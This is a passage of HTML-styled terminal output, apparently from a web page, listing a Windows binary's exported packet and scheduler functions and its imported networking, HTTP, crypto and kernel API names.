line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>63) packet_get_tlv_value_bool</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>64) packet_get_tlv_value_qword</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>65) packet_get_tlv_value_raw</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>66) packet_get_tlv_value_string</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>67) packet_get_tlv_value_uint</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>68) packet_get_tlv_value_wstring</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>69) packet_get_type</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>70) packet_is_tlv_null_terminated</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>71) packet_remove_completion_handler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>72) packet_transmit_empty_response</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>73) packet_transmit_response</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>74) scheduler_destroy</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>75) scheduler_initialize</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>76) scheduler_insert_waitable</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>77) scheduler_signal_waitable</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>78) scheduler_waitable_thread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.ntohl</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.connect</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.htonl</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.htons</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.inet_addr</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.inet_ntoa</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.listen</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.send</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.WSADuplicateSocketA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.WSAGetLastError</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.WSASetLastError</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.WSAStartup</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.getservbyname</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.getservbyport</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.gethostbyname</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.gethostbyaddr</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.socket</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.setsockopt</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.select</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.recv</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.ntohs</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.shutdown</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.closesocket</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.bind</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.accept</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- CRYPT32.dll.CertGetCertificateContextProperty</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.HttpQueryInfoW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetOpenW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetCloseHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetConnectW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetReadFile</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetSetOptionW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.HttpOpenRequestW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.HttpSendRequestW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WININET.dll.InternetCrackUrlW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpOpenRequest</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpReadData</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpConnect</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpCloseHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpCrackUrl</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpSetOption</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpQueryOption</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpOpen</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpGetIEProxyConfigForCurrentUser</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpGetProxyForUrl</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpQueryHeaders</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpReceiveResponse</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WINHTTP.dll.WinHttpSendRequest</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CompareStringW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetStringTypeW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateFileW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.LoadLibraryExW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.OutputDebugStringW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FileTimeToSystemTime</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SystemTimeToTzSpecificLocalTime</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetDriveTypeW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FindFirstFileExW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetStdHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetFilePointerEx</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ReadConsoleW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetConsoleCP</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FlushFileBuffers</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TlsFree</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TlsSetValue</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TlsGetValue</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TlsAlloc</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TerminateProcess</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetProcAddress</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FlushInstructionCache</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.VirtualAlloc</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 